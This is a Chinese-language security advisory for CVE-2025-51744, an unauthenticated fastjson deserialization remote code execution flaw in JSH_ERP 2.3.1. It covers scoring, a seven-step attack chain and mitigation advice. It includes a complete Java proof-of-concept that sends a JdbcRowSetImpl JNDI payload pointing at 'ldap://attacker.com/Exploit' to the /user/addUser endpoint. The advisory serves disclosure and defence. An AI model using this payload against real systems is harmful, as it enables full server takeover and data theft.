CVE-2025-51744 JSH_ERP fastjson反序列化远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-51744

漏洞类型

反序列化漏洞/远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

jishenghua JSH_ERP

漏洞概述

JSH_ERP（极客ERP）是一款由吉晟花科技开发的企业资源规划系统。该系统在2.3.1版本中存在严重的fastjson反序列化安全漏洞。漏洞位于系统用户管理模块的/user/addUser接口，攻击者可以通过构造恶意的JSON序列化数据，在未经任何认证的情况下远程触发反序列化操作，从而实现任意代码执行。由于该漏洞影响的是服务端核心组件，攻击成功后将直接获取服务器完全控制权，可能导致企业敏感数据泄露、业务系统瘫痪等严重后果。该漏洞CVSS评分高达9.8分，属于严重级别漏洞，建议受影响用户立即采取修复措施。

技术细节

该漏洞源于JSH_ERP 2.3.1版本中使用的fastjson库存在反序列化安全缺陷。fastjson是阿里巴巴开源的Java JSON解析库，其AutoType机制允许在反序列化时指定任意类型，攻击者可利用这一特性构造恶意payload。当用户请求/user/addUser接口时，系统会对请求参数进行JSON反序列化处理，攻击者可通过构造包含@type字段的恶意JSON数据，指定加载任意恶意类（如com.sun.rowset.JdbcRowSetImpl、org.apache.commons.collections.Transformer等），在反序列化过程中触发JNDI注入或反射调用，最终执行任意命令。典型利用方式是通过LDAP/RMI协议绑定恶意类，诱导服务器从攻击者控制的恶意服务器加载并执行代码。由于该接口无需认证即可访问，且系统默认配置未启用safeMode安全模式，因此漏洞利用门槛极低，危害极大。

攻击链分析

STEP 1

步骤1

攻击者识别目标JSH_ERP系统版本为2.3.1，确认存在/user/addUser接口

STEP 2

步骤2

攻击者构造包含@type字段的恶意fastjson payload，指定com.sun.rowset.JdbcRowSetImpl等类触发JNDI注入

STEP 3

步骤3

攻击者搭建恶意LDAP/RMI服务器，准备好包含恶意代码的Exploit类

STEP 4

步骤4

通过HTTP POST请求将恶意payload发送至目标服务器/user/addUser端点，无需任何认证

STEP 5

步骤5

目标服务器fastjson库反序列化时解析@type字段，触发JdbcRowSetImpl的lookup操作连接恶意LDAP服务器

STEP 6

步骤6

恶意LDAP服务器返回指向攻击者服务器的引用，服务器加载并执行恶意class文件

STEP 7

步骤7

攻击者成功在目标服务器上执行任意系统命令，获得服务器完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;

public class CVE_2025_51744_PoC {
    public static void main(String[] args) throws Exception {
        String targetUrl = "http://target:8080/user/addUser";
        
        // Malicious fastjson payload for JNDI injection
        String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://attacker.com/Exploit\",\"autoCommit\":true}";
        
        URL url = new URL(targetUrl);
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
        conn.setRequestMethod("POST");
        conn.setRequestProperty("Content-Type", "application/json");
        conn.setDoOutput(true);
        
        try (OutputStream os = conn.getOutputStream()) {
            byte[] input = payload.getBytes("UTF-8");
            os.write(input, 0, input.length);
        }
        
        int responseCode = conn.getResponseCode();
        System.out.println("Response Code: " + responseCode);
        
        try (BufferedReader br = new BufferedReader(
                new InputStreamReader(conn.getInputStream(), "UTF-8"))) {
            StringBuilder response = new StringBuilder();
            String responseLine;
            while ((responseLine = br.readLine()) != null) {
                response.append(responseLine.trim());
            }
            System.out.println("Response: " + response.toString());
        }
    }
}

影响范围

JSH_ERP 2.3.1

防御指南

临时缓解措施

立即在应用层防火墙（WAF）或API网关配置规则，临时拦截包含@type、@jsonType等fastjson反序列化特征字段的JSON请求。同时在JVM启动参数中添加-Dfastjson.parser.autoTypeSupport=false禁用AutoType功能。对于生产环境，建议尽快安排系统升级，使用官方发布的安全补丁或将fastjson库升级至1.2.83以上版本，并确保启用safeMode。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-51744
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-51744
3 Details https://www.cvedetails.com/cve/CVE-2025-51744/
4 VulDB https://vuldb.com/cve/CVE-2025-51744
5 Link https://blog.hackpax.top/jsh-erp3/
6 Link https://gist.github.com/Paxsizy/cd1557aeba8093a8650601c4dbffb6f9
7 Link https://gitee.com/jishenghua
8 Link https://gitee.com/jishenghua/JSH_ERP